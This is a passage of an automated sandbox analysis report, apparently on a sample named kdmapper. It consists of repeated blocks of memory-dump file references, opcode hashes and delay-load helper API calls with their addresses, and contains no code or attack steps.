                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 89e96ea90aaa49476c056a18202363122990bfb2e663008cebb04dbaa33a83ca
                                                                                                                                                                                                              • Instruction ID: be1ec98b09c599b59dc0f2b153019f5ac62011b90ad385af5c312accf344e6eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89e96ea90aaa49476c056a18202363122990bfb2e663008cebb04dbaa33a83ca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51B012E1299304AC311462162D03C37430DC0C0B20331D13EF906D0290DC50AD490471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 022e6b213762573997fa03792102b39a7cb9f16dfb1e8a1cc1ba82fcbe0539f1
                                                                                                                                                                                                              • Instruction ID: 980bcd820b46b97dff9b7a98941c6e5ab8929e9646910da56eb3757f0115ef86
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 022e6b213762573997fa03792102b39a7cb9f16dfb1e8a1cc1ba82fcbe0539f1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08B012E1399344BC315462162C03C37030DC0C0B20331D63EF906D0290D840AC840471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 0311912091abf9ed099cff9d3746b2aee9c5a294152c1bea9759f8294a3c30e3
                                                                                                                                                                                                              • Instruction ID: 0a6f3a86d1658b228e042ec3e1c17d290179fe84630efad5143dde2a192ab504
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0311912091abf9ed099cff9d3746b2aee9c5a294152c1bea9759f8294a3c30e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0CB012F1299304AC311461172C03C37430DC0C0F20331D03EF906D0191D840AD400471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: a61d11c6936959e72300907bae8d46d0a130c4d756a22ece6c044a44521a76ae
                                                                                                                                                                                                              • Instruction ID: 88003e49b80df450798b40114452f38cad500d7704772ac9f0acebca35759a7a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a61d11c6936959e72300907bae8d46d0a130c4d756a22ece6c044a44521a76ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94B012F1299304AC311461172D03C37430DC0C0F20331D03EF906D0190DC40AE410471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 4b5eea86a4ae2134484289feddb65abcb1c2b8f916835656a3398165217d4e7f
                                                                                                                                                                                                              • Instruction ID: a00d248028544714be975a602a3ccc849c7211649a22c68f0765e32d5387d126
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4b5eea86a4ae2134484289feddb65abcb1c2b8f916835656a3398165217d4e7f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20B012F1299304BC315461172C03C37030DC0C0F20331D13EF906D0190D840AD800471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 2105dc7726a9c28d970a4856cbf9cf42c109c12b651944ecc5e23e6bc23d2b35
                                                                                                                                                                                                              • Instruction ID: a1b82e12961a36852fc21a68b68f9a7ac7712edc754266c80a528f36ae8980dc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2105dc7726a9c28d970a4856cbf9cf42c109c12b651944ecc5e23e6bc23d2b35
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67B012F1298384FC3108E1142C07C3B038CC0C0F21332E22EFA05E1090D8408C440473
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 3561d766e2d53bf4405c5620afc7504112890d277ed1d228151331b146a90ab0
                                                                                                                                                                                                              • Instruction ID: 6d24ae51163ef5d105e79c0f9d9c2dfdc643be1a658b8b81ab826b64806519aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3561d766e2d53bf4405c5620afc7504112890d277ed1d228151331b146a90ab0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 00B012F1298394BC3208A1142D07C7B434CC0C0F21332E22EF705E1090D8404C490473
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE3FC
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 701fe1dd84edf85fa0f33c59bfe8f60167523cb81f1f908db2706c761c0d00b0
                                                                                                                                                                                                              • Instruction ID: ba3c814bd144b17bfcc45a61caa89cad00a1fd7582b6ffc9a8efcd6e665e0a56
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 701fe1dd84edf85fa0f33c59bfe8f60167523cb81f1f908db2706c761c0d00b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5BB012F1298384FC3108A1152C07C3B034CC0C0F21332E22EF905E1090D8408E400473
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE580
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 8e9142e7812e14db55140c68a457e285a9258066125d884943f92fa8712d8e80
                                                                                                                                                                                                              • Instruction ID: 3a0f26a4c41a2d6d9137fa5f86926e99d2470e43e0bcdfec833034c9160caad9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8e9142e7812e14db55140c68a457e285a9258066125d884943f92fa8712d8e80
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39B012D169D31C7D310861643C03C37030CC0C0F20332E02EF505D5690E8404C800471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE580
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: c14f9b6ee79536bc86fa45306a2853ef6ed9546bd3f022daa7ce066f4941cc42
                                                                                                                                                                                                              • Instruction ID: a1e650ed93185bb344fa34095d982ad33a6f50453936c386d7d3643f083b98be
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c14f9b6ee79536bc86fa45306a2853ef6ed9546bd3f022daa7ce066f4941cc42
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44B012D129D3187C314461647C03C37031CC0C0F20332E22EF505D5290E8404CC00471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE580
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 5d29eb46ff9678fad018827ce7d2a1fc341a982ae44f3100a7c66a3bb853f6e4
                                                                                                                                                                                                              • Instruction ID: 0a29b3b08c21a59bda391755cc8f44aa89a71b912e8f0e1c1bf2afdd9a80cb71
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d29eb46ff9678fad018827ce7d2a1fc341a982ae44f3100a7c66a3bb853f6e4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DB012D129D3187C310461647D03C37031CC0C0F20332E22EF505D5290EC404D810471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: cc3bab7e9826416a9d15e4b8c3f8a5556a10897208e50a181878e14df570aed9
                                                                                                                                                                                                              • Instruction ID: ac1615acb00cfb2e455e8855215c8b2395eac15b61d70c6bd2c7547449ada9aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc3bab7e9826416a9d15e4b8c3f8a5556a10897208e50a181878e14df570aed9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12B012D16993047C320461186C03C3B030CC0C1F20331E32EF515D0191E8404C840471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                                                                                              • Opcode ID: 6f80ed3f215fe158be4720bc575888d8e5502cb2239bd0b891840560a97adcf1
                                                                                                                                                                                                              • Instruction ID: 884204ca9350b54accca05da67a46e157abdb00db0da84427ce673a0b8973d3a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6f80ed3f215fe158be4720bc575888d8e5502cb2239bd0b891840560a97adcf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80B012D16992047C310421342C07C3B030DC4C1F20331E13EF561E0492E8404D440471
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DFE51F
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
                                                                                                                                                                                                                • Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
